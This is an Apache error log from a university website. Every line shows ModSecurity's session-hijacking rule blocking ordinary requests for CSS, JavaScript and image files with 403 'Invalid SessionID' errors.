[Mon Aug 28 08:10:52.009099 2023] [:error] [pid 38149] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv0HMCo-f0AAJUFNToAAAAA"]
[Mon Aug 28 08:10:52.009143 2023] [:error] [pid 38196] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv0HMCo-f0AAJU0qbAAAAAD"]
[Mon Aug 28 08:10:52.014963 2023] [:error] [pid 37539] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv0HMCo-f0AAJKjZ-MAAAAG"]
[Mon Aug 28 08:10:52.023887 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv0HMCo-f0AAJUGIVwAAAAC"]
[Mon Aug 28 08:10:52.057289 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv0HMCo-f0AAJWfZHoAAAAI"]
[Mon Aug 28 08:10:52.135102 2023] [:error] [pid 38302] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOv0HMCo-f0AAJWeoS0AAAAF"]
[Mon Aug 28 08:10:53.005549 2023] [:error] [pid 38059] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0HcCo-f0AAJSr2uUAAAAO"]
[Mon Aug 28 08:12:06.572083 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0ZsCo-f0AAJU0qcAAAAAD"]
[Mon Aug 28 08:12:06.572660 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv0ZsCo-f0AAJUz@nMAAAAM"]
[Mon Aug 28 08:12:06.746922 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv0ZsCo-f0AAJSxYz8AAAAH"]
[Mon Aug 28 08:12:06.760368 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv0ZsCo-f0AAJKjZ-0AAAAG"]
[Mon Aug 28 08:12:06.761420 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv0ZsCo-f0AAJWfZIsAAAAI"]
[Mon Aug 28 08:12:06.767433 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv0ZsCo-f0AAJOr980AAAAL"]
[Mon Aug 28 08:12:06.923750 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0ZsCo-f0AAJWeoTgAAAAF"]
[Mon Aug 28 08:12:07.659350 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0Z8Co-f0AAJUz@nQAAAAM"]
[Mon Aug 28 08:12:07.705676 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0Z8Co-f0AAJOr984AAAAL"]
[Mon Aug 28 08:12:07.743216 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0Z8Co-f0AAJSr2vIAAAAO"]
[Mon Aug 28 08:12:07.824801 2023] [:error] [pid 38150] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0Z8Co-f0AAJUGIWsAAAAC"]
[Mon Aug 28 08:12:07.836200 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0Z8Co-f0AAJWeoTkAAAAF"]
[Mon Aug 28 08:12:07.838797 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0Z8Co-f0AAJSr2vMAAAAO"]
[Mon Aug 28 08:12:07.841539 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0Z8Co-f0AAJKjZ-4AAAAG"]
[Mon Aug 28 08:12:07.932143 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0Z8Co-f0AAJSxY0AAAAAH"]
[Mon Aug 28 08:12:07.979389 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0Z8Co-f0AAJWfZIwAAAAI"]
[Mon Aug 28 08:12:07.994927 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv0Z8Co-f0AAJOr988AAAAL"]
[Mon Aug 28 08:12:07.995336 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv0Z8Co-f0AAJUz@nUAAAAM"]
[Mon Aug 28 08:12:07.996446 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv0Z8Co-f0AAJSxY0EAAAAH"]
[Mon Aug 28 08:12:08.091675 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv0aMCo-f0AAJKjZ-8AAAAG"]
[Mon Aug 28 08:12:08.092630 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv0aMCo-f0AAJTincEAAAAE"]
[Mon Aug 28 08:12:08.099965 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv0aMCo-f0AAJSr2vQAAAAO"]
[Mon Aug 28 08:12:08.154740 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv0aMCo-f0AAJUz@nYAAAAM"]
[Mon Aug 28 08:12:08.169504 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv0aMCo-f0AAJWfZI0AAAAI"]
[Mon Aug 28 08:12:08.171404 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv0aMCo-f0AAJU0qcIAAAAD"]
[Mon Aug 28 08:12:08.232692 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv0aMCo-f0AAJSxY0IAAAAH"]
[Mon Aug 28 08:12:08.250803 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv0aMCo-f0AAJUz@ncAAAAM"]
[Mon Aug 28 08:12:08.250917 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv0aMCo-f0AAJOr99AAAAAL"]
[Mon Aug 28 08:12:08.253756 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv0aMCo-f0AAJSr2vUAAAAO"]
[Mon Aug 28 08:12:08.314671 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv0aMCo-f0AAJU0qcMAAAAD"]
[Mon Aug 28 08:12:08.316060 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv0aMCo-f0AAJKjaAAAAAAG"]
[Mon Aug 28 08:12:08.316438 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv0aMCo-f0AAJSxY0MAAAAH"]
[Mon Aug 28 08:12:08.379708 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv0aMCo-f0AAJOr99EAAAAL"]
[Mon Aug 28 08:12:08.383185 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv0aMCo-f0AAJTincIAAAAE"]
[Mon Aug 28 08:12:08.383280 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv0aMCo-f0AAJUz@ngAAAAM"]
[Mon Aug 28 08:12:08.460922 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv0aMCo-f0AAJWeoToAAAAF"]
[Mon Aug 28 08:12:08.464303 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv0aMCo-f0AAJU0qcQAAAAD"]
[Mon Aug 28 08:12:08.464549 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv0aMCo-f0AAJOr99IAAAAL"]
[Mon Aug 28 08:12:08.467012 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0aMCo-f0AAJKjaAEAAAAG"]
[Mon Aug 28 08:12:08.467919 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0aMCo-f0AAJSxY0QAAAAH"]
[Mon Aug 28 08:12:08.475398 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv0aMCo-f0AAJWfZI4AAAAI"]
[Mon Aug 28 08:12:08.554903 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0aMCo-f0AAJTincMAAAAE"]
[Mon Aug 28 08:12:08.569655 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0aMCo-f0AAJWfZI8AAAAI"]
[Mon Aug 28 08:12:08.621423 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0aMCo-f0AAJKjaAIAAAAG"]
[Mon Aug 28 08:12:08.626682 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0aMCo-f0AAJWeoTsAAAAF"]
[Mon Aug 28 08:12:08.634748 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0aMCo-f0AAJSr2vYAAAAO"]
[Mon Aug 28 08:12:08.635700 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0aMCo-f0AAJUz@nkAAAAM"]
[Mon Aug 28 08:12:08.713489 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0aMCo-f0AAJSxY0UAAAAH"]
[Mon Aug 28 08:12:08.715657 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv0aMCo-f0AAJWeoTwAAAAF"]
[Mon Aug 28 08:12:08.778537 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv0aMCo-f0AAJUz@noAAAAM"]
[Mon Aug 28 08:12:08.879715 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv0aMCo-f0AAJKjaAMAAAAG"]
[Mon Aug 28 08:12:09.675549 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv0acCo-f0AAJUz@nsAAAAM"]
[Mon Aug 28 08:12:09.676785 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv0acCo-f0AAJSxY0YAAAAH"]
[Mon Aug 28 08:12:09.679779 2023] [:error] [pid 38233] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv0acCo-f0AAJVZ9hUAAAAR"]
